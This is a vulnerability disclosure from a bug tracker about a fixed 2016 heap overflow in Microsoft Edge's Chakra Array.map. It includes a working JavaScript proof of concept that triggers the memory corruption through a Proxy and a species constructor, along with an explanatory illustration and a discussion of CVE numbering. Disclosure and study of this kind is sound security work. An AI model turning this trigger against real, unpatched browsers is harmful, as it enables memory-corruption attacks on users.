Status: Fixed
Closed: Oct 2016
Microsoft Edge: Heap Overflow in Array.map
Project Member Reported by natashenka@google.com, Sep 1 2016
There is a heap overflow in Array.map in Chakra. In Js::JavascriptArray::MapHelper, if the array that is being mapped is a Proxy, ArraySpeciesCreate is used to create the array that the mapped values are copied into. They are then written to the array using DirectSetItemAt, even though there is no guarantee the array is a Var array. If it is actually an int array, it will be shorter than this function expects, causing a heap overflow. A minimal PoC is as follows:

var d = new Array(1,2,3);    // short int array; handed back as the map result via species

class dummy {
    constructor() {
        alert("in constructor");
        return d;            // species constructor returns the pre-existing int array
    }
}

var handler = {
    get: function(target, name) {
        if (name == "length") {
            return 0x100;    // proxy reports a length far larger than d can hold
        }
        return {[Symbol.species] : dummy};   // the "constructor" lookup yields this species
    },

    has: function(target, name) {
        return true;         // every index is reported present, so every slot gets written
    }
};

var p = new Proxy([], handler);

var a = new Array(1,2,3);

function test() {
    return 0x777777777777;   // mapped value, written into the result with DirectSetItemAt
}

var o = a.map.call(p, test);

A full PoC is attached.


This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.


map.html (731 bytes)
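To make the mechanism in the report concrete, here is an added illustration (not code from the report or from ChakraCore) of the ES2016 ArraySpeciesCreate and map steps written in plain JavaScript and run in a safe engine: it shows that the result array handed to map is chosen entirely by the Proxy handler, can be a pre-existing object, and can be far shorter than the handler-reported length, which is why an engine fast path must re-check the result's type instead of assuming a fresh Var array. The handler and `Dummy` class mirror the shape of the PoC above; `specMap` and `arraySpeciesCreate` are names chosen for this example.

```javascript
// Spec-style ArraySpeciesCreate (ES2016 9.4.2.3). On a Proxy over an array
// both property reads go through the handler's get trap.
function arraySpeciesCreate(original, length) {
  if (!Array.isArray(original)) return new Array(length); // IsArray is true for a Proxy of an array
  let C = original.constructor;            // Proxy: handler.get(target, "constructor")
  if (C !== undefined && (typeof C === "object" || typeof C === "function")) {
    C = C[Symbol.species];                 // handler-supplied species constructor
    if (C === null) C = undefined;
  }
  if (C === undefined) return new Array(length);
  if (typeof C !== "function") throw new TypeError("species is not a constructor");
  return new C(length);                    // may return any object, e.g. an existing array
}

// Spec-style Array.prototype.map (ES2016 22.1.3.15): writes go through the
// generic CreateDataProperty path, which re-checks the target's shape on every store.
function specMap(O, fn) {
  const len = O.length;                    // Proxy: handler.get(target, "length")
  const A = arraySpeciesCreate(O, len);
  for (let k = 0; k < len; k++) {
    if (k in O) {                          // HasProperty -> handler.has
      A[k] = fn(O[k], k, O);
    }
  }
  return A;
}

// Same handler shape as the report's PoC: "length" is reported as 0x100 and the
// species constructor hands back a pre-existing three-element integer array.
function runScenario() {
  const d = [1, 2, 3];
  class Dummy { constructor() { return d; } }
  const handler = {
    get(target, name) {
      if (name === "length") return 0x100;
      return { [Symbol.species]: Dummy };
    },
    has() { return true; },
  };
  const p = new Proxy([], handler);
  const result = specMap(p, () => 0x777777777777);
  // In a safe engine d simply grows to 256 elements; the Chakra fast path
  // instead wrote 256 Vars into storage sized for three ints.
  return { sameObject: result === d, length: d.length, last: d[0xff] };
}
```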
Project Member Comment 1 by natashenka@google.com, Sep 8 2016
Labels: MSRC-34948
Project Member Comment 2 by natashenka@google.com, Oct 11 2016
Labels: CVE-2016-7190
Project Member Comment 3 by natashenka@google.com, Oct 12 2016
Status: Fixed
Project Member Comment 4 by natashenka@google.com, Oct 19 2016
Labels: -Restrict-View-Commit
Hi, I have a question.
I think this issue is the same as CVE-2016-3377, which was fixed in Sep.
Why does this issue have a different CVE number and get fixed again in Oct...
Thanks for your help!
Project Member Comment 6 by natashenka@google.com, Dec 11 2016
I took a look at this in September, and from what I could tell they fixed a different vulnerability in Array.map than the one I reported.
Hello, thanks for your patient reply.
Here is the diff and PoC for 3377 from September:
https://github.com/Microsoft/ChakraCore/commit/24c4d7df8199b27d360323ce3be1d7959fd918eb#diff-49bb5a3c5aa249e3dcefd245e91df5f7
Could you have a look, please?
On the other hand, I can't repro your PoC in the versions between September and Oct.

Project Member Comment 8 by natashenka@google.com, Dec 15 2016
Labels: CVE-2016-3377
I checked with Microsoft, and they confirmed these are the same issue.